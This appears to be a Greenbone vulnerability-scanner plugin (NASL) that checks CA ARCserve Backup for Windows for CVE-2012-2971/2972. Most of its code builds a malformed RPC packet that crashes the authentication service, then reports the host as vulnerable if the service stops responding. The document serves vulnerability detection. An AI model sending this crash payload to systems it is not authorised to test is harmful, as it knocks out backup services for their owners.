CA ARCserve Backup is prone to multiple vulnerabilities.
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.802677");
script_version("2023-09-08T05:06:21+0000");
script_cve_id("CVE-2012-2971", "CVE-2012-2972");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2023-09-08 05:06:21 +0000 (Fri, 08 Sep 2023)");
script_tag(name:"creation_date", value:"2012-11-20 11:04:50 +0530 (Tue, 20 Nov 2012)");
script_name("CA ARCserve Backup RPC Services Multiple Vulnerabilities - Windows");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2012 Greenbone AG");
script_family("Denial of Service");
script_dependencies("gb_rpc_portmap_tcp_detect.nasl", "os_detection.nasl");
script_mandatory_keys("rpc/portmap/tcp/detected", "Host/runs_windows");
script_xref(name:"URL", value:"http://secunia.com/advisories/51012/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56116");
script_xref(name:"URL", value:"http://www.offensive-security.com/vulndev/ca-arcserve-rwslist-remote-code-execution/");
script_xref(name:"URL", value:"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={F9EEA31E-8089-423E-B746-41B5C9DD2AC1}");
script_tag(name:"impact", value:"Successful exploitation will remote attackers to execute arbitrary code or
cause a denial of service condition.");
script_tag(name:"affected", value:"CA ARCserve Backup for Windows r12.5, r15, r16.");
script_tag(name:"insight", value:"The flaws are due to an error in the RPC service, which fails to validate
user supplied crafted input.");
script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");
script_tag(name:"summary", value:"CA ARCserve Backup is prone to multiple vulnerabilities.");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("rpc.inc");
include("http_func.inc");
include("host_details.inc");
include("byte_func.inc");
RPC_PROG = "100000";
port = rpc_get_port(program: RPC_PROG, protocol: IPPROTO_TCP);
if(port)
{
# authentication service port request
req_getport = raw_string(
0x80, 0x00, 0x00, 0x38, 0x4f, 0x9d, 0xb4, 0xb2, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x86, 0xa0, 0x00, 0x00, 0x00, 0x02,
0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x09, 0x80,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00);
soc = open_sock_tcp(port);
send(socket:soc, data:req_getport);
res = recv(socket:soc, length:100);
close(soc);
if(isnull(res)){
exit(0);
}
reslen = strlen(res);
# authentication service port number
authport = hex2dec(xvalue:hexstr(res[reslen-2])+hexstr(res[reslen-1]));
# dos request
dos = raw_string(
0x80, 0x00, 0x02, 0x68, 0x4f, 0x9d, 0x17, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x02, 0x00, 0x06, 0x09, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x7a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa1, 0x02, 0x35, 0x32, 0x35,
0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x41,
0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30, 0x30,
0x30, 0x31) + crap(data:raw_string(0x30), length:98) + raw_string(
0x34, 0x45, 0x38, 0x44, 0x44, 0x31, 0x36, 0x34, 0x44, 0x33, 0x41, 0x37, 0x31,
0x42, 0x39, 0x43, 0x36, 0x46, 0x34, 0x43, 0x46, 0x42, 0x41, 0x42, 0x34, 0x32,
0x35, 0x35, 0x42, 0x44, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x02,
0x35, 0x32, 0x35, 0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30,
0x30, 0x30, 0x41, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30,
0x30, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30) +
crap(data:raw_string(0x30), length:89) + raw_string (
0x46, 0x30, 0x38, 0x30, 0x31, 0x43, 0x42, 0x41, 0x37, 0x38, 0x37, 0x36, 0x44,
0x46, 0x30, 0x45, 0x44, 0x41, 0x44, 0x31, 0x36, 0x44, 0x43, 0x38, 0x36, 0x36,
0x38, 0x39, 0x37, 0x33, 0x43, 0x31, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41,
## xdr_list was expected here, we replace it with
## an xdr_string to trigger the bug
0x00, 0x00, 0x00, 0x06, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x00,
## string
0x00, 0x00, 0x00, 0x17, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x00);
soc2 = open_sock_tcp(authport);
if(soc2)
{
send(socket:soc2, data:dos);
res = recv(socket:soc2, length:100);
close(soc2);
sleep(15);
soc3 = open_sock_tcp(authport);
if(!soc3)
{
security_message(port:port, protocol:"tcp");
exit(0);
}
close(soc3);
}
}